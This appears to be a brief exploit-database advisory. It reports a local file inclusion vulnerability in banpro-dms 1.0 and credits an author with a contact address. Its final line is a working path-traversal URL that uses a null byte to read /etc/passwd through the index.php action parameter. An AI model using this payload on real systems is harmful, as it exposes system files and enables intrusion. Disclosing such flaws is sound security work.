banpro-dms version 1.0 suffers from a local file inclusion vulnerability.
8796884250e0a73a11ebbe01ef133a0dab3dd9e4ad2ae76caf3921fc1643d413
banpro-dms 1.0 local file inclusion vulnerability
download http://sourceforge.net/projects/banprodms
author muuratsalo
contact muuratsalo[at]gmail.com
exploit
http://localhost/DMS/index.php?action=../../../../../../../../../../etc/passwd%00